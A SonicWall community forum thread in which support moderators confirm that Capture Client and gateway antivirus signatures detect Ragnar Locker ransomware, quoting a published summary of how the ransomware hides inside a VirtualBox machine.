Join the Conversation

To sign in, use your existing MySonicWall account. To create a free MySonicWall account click "Register".

Ragnar Locker ransomware

TomChouTomChou Newbie ✭

Can Sonicwall Capture Client detect new Ragnar Locker ransomware uses a clever trick to dodge detection?

https://tech.hindustantimes.com/tech/news/a-new-ransomware-uses-virtual-machine-to-dodge-security-71590409211492.html

Category: Capture Client
Reply

Best Answers

  • CORRECT ANSWER
    shiprasahu93shiprasahu93 Moderator
    Accepted Answer

    Hello @TomChou,

    We have confirmation from the SentinelOne team now. So, the capture client general release 2.0.28 running S1 version 3.6.6.104 as well as the latest release 3.0.11 running S1 version 4.0.4.81 both can defend against the Ragnar Locker ransomware.

    So, the answer would be yes, you are completely protected against this ransomware attack if you have the updated client version.

    I hope that helps!

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services

  • CORRECT ANSWER
    KaranMKaranM Moderator
    Accepted Answer

    ThankYou @shiprasahu93

    Adding to this as per Sophos lab " Ragnar Locker works in a tricky way, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server.”

    “In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script. The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys,” the company added.


    SentinelOne’ s Dynamic behavior engine will block any unsigned MSI/exe file from being executed and report it back to console, hence we should detect this ransomware as well if you have the updated client version as recommended by Shipra.

  • CORRECT ANSWER
    TomChouTomChou Newbie ✭
    Accepted Answer

    Thanks @shiprasahu93 & @KaranM  for the answer.🙂

Answers

  • Halon5Halon5 Newbie

    Now I'm interested to know if there is a GAV / IPS signature for this... ? SW Team?

  • shiprasahu93shiprasahu93 Moderator

    Hey @Halon5,

    That is an excellent question. I have already asked this to our IPS and GAV teams. I will update you as soon as I have that information.

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services

  • shiprasahu93shiprasahu93 Moderator

    Hello @Halon5,

    I apologize for the late response. So, these are the signatures on the GAV engine on the firewall that protects against 'Ragnar Locker Ransomware'

    Covid.N_17

    Ragnar.DN

    I hope that helps!

    Thanks!!

    Shipra Sahu

    Technical Support Advisor, Premier Services

Sign In or Register to comment.